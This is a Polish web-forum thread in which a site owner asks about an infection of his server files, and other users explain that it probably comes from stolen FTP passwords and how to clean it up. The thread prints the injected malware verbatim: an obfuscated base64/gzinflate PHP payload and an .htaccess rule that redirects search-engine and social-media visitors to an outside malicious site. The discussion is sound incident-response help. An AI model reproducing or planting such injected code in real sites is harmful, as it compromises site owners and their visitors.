Forum PHP.pl

Witam, z takim oto kodem spotkałem się gdy google przysłało mi maila o zainfekowanych plikach na serwerze.

[PHP] pobierz, plaintext 
#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkb
T2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9
xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH
6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMa
rENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#
[PHP] pobierz, plaintext 

Wie ktoś może, czego to jest zasługa, że każdy plik index (nie tylko) dostał coś takiego i "zawirusował" stronę?
Będzie konieczny reinstal, czy to po prostu robota jakiegoś robaczka ze strony komputera, na którym logował eis jakiś user do FTP.

Wszystkie konta FTP wyłączone, więc mam nadzieje problemu nie będzie.
Jeżeli to zły dział, to proszę o przeniesienie i dzięki za odpowiedzi.

Spotkał ktoś się kiedyś z czymś podobnym?

Tak to jest wirus, dość popularny problem i generalnie dość upierdliwy bo potrafi nawracać. Musisz wyczyścić wszystkie pliki z tego kodu, a następnie zmienić hasła do ftp. Jeżeli masz taką możliwość to usuń pliki z serwera i wgraj jeszcze raz. Jak już to zrobisz to w Narzędziach dla webmastera Google zgłaszasz stronę do ponownego przeglądu, żeby została usunięta z czarnej listy.

Jeżeli używasz Total Commander'a do łączenia z ftp to bardzo możliwe, że to jego zasługa bo, któraś tam wersja miała dziurę i hasła wyciekały. W takim przypadku usuń go i zainstaluj coś lepszego np. FileZilla albo WinSCP.

i jeśli nie jest to dla ciebie problemem, to nie zapamiętuj haseł

hasła co tydzień zmieniam (IMG:style_emoticons/default/smile.gif) tak jakoś przywykłem, mam FileZille bo TotalCMD jakoś nie przemawia do mnie, pliki na 99% wszystkie wyczyszczone... Jest opcja, że to jakiś pliczek może też za to odpowiadać?

Wiesz teoretycznie wszystko jest możliwe, może to być wina skryptu, złe zabezpieczenia hostingu, złe zabezpieczenia sieci wifi, więc możliwości czysto teoretycznie jest dużo. Aczkolwiek w tym przypadku najczęściej to działa tak, że wirus pobiera hasła zapisane w programach do ftp na komputerze, tak więc warto żebyś zrobił porządny skan swojego kompa. Z tego co czytam to FileZilla też jest potencjalnie zagrożona. Ja obecnie używam WinSCP i już dawno nie miałem takich problemów.

@DOWN: Wyczyścić musisz wszystkie pliki, a nie 99%, bo jak zostanie jeden plik to i tak Google będzie Cie blokowało, jak możesz to wywal wszystko i wgraj na nowo, albo przeszukaj pliki jakimś programem, który wyszuka te kody.

Ten post edytował tehaha 2.06.2012, 08:54:17

http://drbolivar.com/stats.php

Na taką stronę przekierowuje mnie moja witryna (?) zaraz poszukam tego przekierowania i pozmieniam dane do FTP, a sobie zapodam dogłębnego formata (IMG:style_emoticons/default/smile.gif)

Tak jak myślałem, htaccess.

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|allt
heuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baid
u|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|brows
eireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|
excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo
|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gala
xy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavi
sta|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|
km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|look
le|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|ne
tzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq
|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|st
artpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnas
e|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanado
o|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya
|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://drbolivar.com/stats.php [R=301,L]
</IfModule>
#/c3284d#

Ten post edytował R0ckY 2.06.2012, 08:25:27